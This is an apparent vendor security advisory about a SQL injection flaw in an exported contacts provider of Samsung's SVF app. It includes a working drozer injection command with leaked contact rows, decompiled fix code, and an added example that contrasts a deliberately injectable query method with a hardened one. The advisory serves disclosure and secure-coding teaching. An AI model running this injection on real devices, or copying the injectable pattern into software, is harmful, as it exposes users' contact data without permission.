The Samsung Voice application (package com.samsung.android.svf, referred to below as SVF) provides a means to control a smartphone through voice commands, such as initiating calls to the device's contacts. It is installed by default on Samsung smartphones, including the Galaxy S6. The application is relatively privileged, holding permissions such as android.permission.READ_CONTACTS, which allow it to read the user's contact data.
Versions of SVF before 1.1.2009 apply no permissions to the com.samsung.android.svf.contacts.contentprovider content provider, so any other application on the device can interact with it. The provider exposes a means to query the device's contacts database, and MDSec identified a SQL injection vulnerability in the projection parameter of the query it runs: the caller-supplied projection strings are placed directly into the SELECT clause of the statement, so a crafted projection can rewrite the rest of the query. As a result, any application on the device can circumvent the Android permission model and retrieve all of the device's contacts without holding android.permission.READ_CONTACTS.
An example of how this issue can be exploited using the drozer attack framework is shown below. The projection "* from data limit 2--" selects every column of the data table and comments out whatever the provider appends after the projection, so the two rows returned come straight from the contacts database:
[code lang="bash"]dz> run app.provider.query content://com.samsung.android.svf.contacts.contentprovider --projection "* from data limit 2--"
| _id | raw_contact_id | contact_id | version | mimetype | data1 | data2 | data3 | data4 | data5 | data6 | data7 | data8 | data9 | times_contacted | starred | display_name | phonetic_name | lookup | in_visible_group | original_id |
| 1 | 9 | 12 | 3 | vnd.android.cursor.item/photo | null | null | null | null | null | null | null | null | null | 0 | 0 | abc@abc.com | null | 814i1e | 0 | null |
| 2 | 19 | 4 | 3 | vnd.android.cursor.item/nickname | null | null | null | null | null | null | null | null | null | 0 | 0 | foo@bar.com | null | 814i1e92d164892150d7 | 0 | null |
dz>
[/code]
This issue is resolved in version 1.1.2009 of the SVF application by applying the following permissions to the content provider, so that only callers holding com.sec.voice.permission.RECEIVE can query it:
[code lang="bash"]
Package: com.samsung.android.svf
Authority: com.samsung.android.svf.contacts.contentprovider
Read Permission: com.sec.voice.permission.RECEIVE
Write Permission: com.sec.voice.permission.RECEIVE
[/code]
Whether these permissions block third-party callers in practice depends on the protection level declared for com.sec.voice.permission.RECEIVE (a signature-level permission can only be granted to applications signed with the same key, whereas a normal-level permission can be requested by any application); the advisory does not state which level is used. In addition to the above, Samsung attempted to resolve the issue by blacklisting certain characters in the projection parameter, as shown in the decompiled query() method below:
[code lang="java"]
// Decompiled from SVF 1.1.2009; TAG, IBase.SEMICOLON and IBase.CLOSING_BRACKET
// are constants defined elsewhere in the application.
public Cursor query(Uri arg0, String[] arg1, String arg2, String[] arg3, String arg4) {
    Log.i(TAG, "query Uri:=" + arg0 + " 1:=" + arg1 + " 2:=" + arg2 + " 3:=" + arg3 + " 4:=" + arg4);
    // The query is executed first, with the caller's projection (arg1) untouched...
    Cursor ret = super.query(arg0, arg1, arg2, arg3, arg4);
    // ...and only afterwards is each projection element checked for a
    // blacklisted character; the result is discarded if one is found.
    for (String query : arg1) {
        if (query.contains("*") || query.contains(IBase.SEMICOLON) || query.contains("'") || query.contains("\"")) {
            return null;
        }
    }
    Log.i(TAG, "query result:=" + ret + " size(" + ret.getCount() + IBase.CLOSING_BRACKET);
    return ret;
}
[/code]
It is worth noting that this blacklisting approach would not be sufficient to resolve the issue on its own. The check runs only after super.query() has already executed the caller's statement, so it can suppress the returned cursor but not the query itself, and the blacklist covers only "*", ";" and the two quote characters: a projection that names columns explicitly instead of using "*" contains none of them. Restricting the projection to a known set of column names before any SQL is built, rather than filtering characters after the fact, is the reliable fix; the permission applied to the provider is what actually closes the issue here.
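The following is an added example (not Samsung's code and not part of the original advisory) that contrasts a query() method with the injectable shape described above against a hardened one. It uses Android's SQLiteQueryBuilder, which is what many providers build their statements with; the class, table, column and permission names are assumptions for illustration, and the permission is a hypothetical stand-in for com.sec.voice.permission.RECEIVE.

```java
// Added example, not code from the SVF application. Names of the class, the
// "data" table, its columns and the permission are assumed for illustration.
package example.provider;

import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;

import java.util.HashMap;
import java.util.Map;

public class HardenedContactsProvider extends ContentProvider {

    // Hypothetical permission standing in for com.sec.voice.permission.RECEIVE.
    private static final String READ_PERMISSION = "com.example.permission.READ_CONTACTS_CACHE";

    // Allowlist of columns a caller may request. Anything not in this map is
    // rejected by SQLiteQueryBuilder with an IllegalArgumentException before
    // any SQL is built, so injected projections never reach SQLite.
    private static final Map<String, String> PROJECTION_MAP = new HashMap<>();
    static {
        PROJECTION_MAP.put("_id", "_id");
        PROJECTION_MAP.put("display_name", "display_name");
        PROJECTION_MAP.put("mimetype", "mimetype");
        PROJECTION_MAP.put("data1", "data1");
    }

    private SQLiteDatabase db; // assumed to be opened in onCreate() of a real provider

    @Override
    public boolean onCreate() {
        return true;
    }

    // Injectable form, shown for comparison only: the caller's projection
    // strings are concatenated straight into "SELECT <projection> FROM data ...",
    // so a projection of "* from data limit 2--" rewrites the statement and
    // comments out the provider's own FROM/WHERE clause.
    public Cursor queryInjectable(String[] projection, String selection,
                                  String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("data");
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        // 1. Enforce the permission in code as well as in the manifest, so the
        //    check does not silently disappear if the manifest is later changed.
        //    Throws SecurityException if the Binder caller lacks the permission.
        getContext().enforceCallingPermission(READ_PERMISSION,
                "caller lacks " + READ_PERMISSION);

        // 2. Validate input before any SQL runs, not after (the shipped
        //    blacklist inspected the projection only once super.query() had
        //    already executed it).
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("data");
        // Unknown column names throw IllegalArgumentException; a null projection
        // expands to exactly the allowlisted columns.
        qb.setProjectionMap(PROJECTION_MAP);
        // Strict mode additionally validates the selection (WHERE clause) and
        // rejects subqueries and other unexpected syntax in it.
        qb.setStrict(true);

        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    // Not needed for this example; a real provider would implement these with
    // the same permission check and input validation.
    @Override public String getType(Uri uri) { return null; }
    @Override public Uri insert(Uri uri, ContentValues values) { return null; }
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) { return 0; }
    @Override public int update(Uri uri, ContentValues values, String selection,
                                String[] selectionArgs) { return 0; }
}
```

With the projection map in place, the drozer query shown earlier fails with "Invalid column * from data limit 2--" instead of returning contact rows, and the permission check rejects callers before that point. A provider that does not need to serve other applications at all should additionally be declared with android:exported="false" in the manifest.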
Disclosure timeline:
13/05/2015: Vulnerability reported to Samsung
15/05/2015: Response from Samsung indicating they will review the issue
15/05/2015: MDSec provide ROM and package versions to Samsung
18/06/2015: Samsung provide update indicating a fix will take time due to negotiations with carriers
24/07/2015: Samsung provide further update indicating they are negotiating a release schedule with the carriers
17/09/2015: MDSec request an update on the issue
23/09/2015: Samsung indicate they are negotiating an OTA update with the carriers
04/11/2015: Update to package received; MDSec ask Samsung whether the issue has been resolved
09/11/2015: Samsung indicate they believe the issue is patched
This issue was disclosed by Dominic Chell.
If you are interested in learning more about the exploitation of mobile devices, get in touch to find out more about our Mobile Application Hacker's Handbook training or Mobile Security services.